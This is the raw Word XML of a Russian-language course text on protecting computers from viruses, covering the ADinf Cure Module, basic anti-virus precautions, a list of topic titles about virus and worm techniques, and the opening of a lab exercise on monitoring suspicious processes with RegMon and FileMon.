        <w:t>ка.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лечащий</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>блок</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ADinf Cure Module. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Adinf Cure Module </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– это программа, которая помогает "вылечить" компьютер от нового вируса, не дожидаясь св</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">жих версий полифагов Aidstest или </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Web, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>которым этот вирус будет изв</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стен.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ADinfCure Module </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>использует тот факт, что, несмотря на огромное разнообразие вирусов, существует совсем немного различных мет</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дов их внедрения в файлы. Во время нормальной работы, при регулярном з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">пуске ревизора ADinf он сообщает </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Adinf Cure Module </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о том, какие файлы изм</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нились с момента последнего запуска. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ADinf Cure Module </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>анализирует эти фа</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лы и записывает в свои таблицы информацию, которая может потребоваться для во</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">становления файла при заражении вирусом. Если заражение произошло, то ADinf заметит изменения и снова вызовет </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ADinfCure Module, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>который на о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нове анализа зараженного файла и сопоставления его с записанной информац</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ей попытается восстановить исходное состояние файла.</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b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основные меры по защите от вирусов</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Для того чтобы не подвергнуть компьютер заражению вирусами и обе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>печить надежное хранение информации на дисках, необходимо соблюдать сл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дующие правила:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>оснастите свой компьютер современными антивирусными пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">граммами, например </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aidstest </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Doctor Web, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и постоянно обновляйте их ве</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сии;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">перед считыванием с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>внешних носителей</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> информации, записанной на других компьютерах, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">всегда проверяйте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>их</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на наличие вирусов, запуская антивиру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ные программы своего компьютера;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>при переносе на свой компьютер файлов в архивированном виде проверяйте их сразу же после разархивации на жестком диске, ограничивая о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ласть проверки только вновь записанными файлами;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>периодически проверяйте на наличие вирусов жесткие диски ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">пьютера, запуская антивирусные программы для тестирования файлов, памяти и системных областей дисков с защищенной от записи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>флэшки</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, предварительно загрузив операционную систему также с защищенной от записи системной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>флэшки</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>всегда защищайте свои дискеты от записи при работе на других компьютерах, если на них не будет производиться запись информации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">обязательно делайте архивные копии на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>флэшки</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ценной для вас информации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>используйте антивирусные программы для входного контроля всех исполняемых файлов, получаемых из компьютерных сетей;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">для обеспечения большей безопасности применения </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aidstest </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Doctor Web </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">необходимо сочетать с повседневным использованием ревизора диска </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ADinf.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>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widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>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D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Резидентные компьютерные вирусы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Самомодифицирующиеся компьютерные вирусы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Компьютерные вирусы операционной системы UNIX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Техника внедрения и удаления кода из PE-файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>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D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Соглашения о вызовах функций Windows API.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Заражение файлов формата PE-executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Принципы работы компьютерных червей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="143" w:name="_Toc3811340"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> работа </w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Мониторинг подозрительных процессов с помощью специальных программ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель работы – </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>научиться практически применять возможности программ RegMon и FileMon для мониторинга подозрительных процессов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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Не все вредоносные программы стремятся скрыть свое присутствие на компьютере. Некоторые ведут себя весьма активно: выводят на экран сообщ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния, открывают страницы веб-сайтов и т.п. Такие проявления логично назвать явными. Другие вредоносные программы специальных сообщений не выводят, но могут провоцировать разного рода сбои в работе компьютера или прикла</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных программ. Например, одним из признаков попытки проникновения червя «Sasser» является появление на экране сообщения о сбое в процессе lsass.exe, в результате чего система будет перезагружена.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сообщение будет отличаться, а именно в нем будет фигурировать lsass.exe, но смысл останется прежним, система будет перезагружена. На сохр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нение и завершение работы компьютера отводится минута времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее, многие вредоносные программы пытаются отключить или полн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стью удалить антивирус, другие блокируют доступ к веб-серверам антивиру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных компаний, чтобы сделать невозможным обновление антивирусных баз. С</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ответственно, если антивирус вдруг ни с того, ни с сего перестал запускаться, либо перестали открываться сайты антивирусных компаний при том, что в ц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лом доступ в Интернет работает нормально, это могут быть проявления вир</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
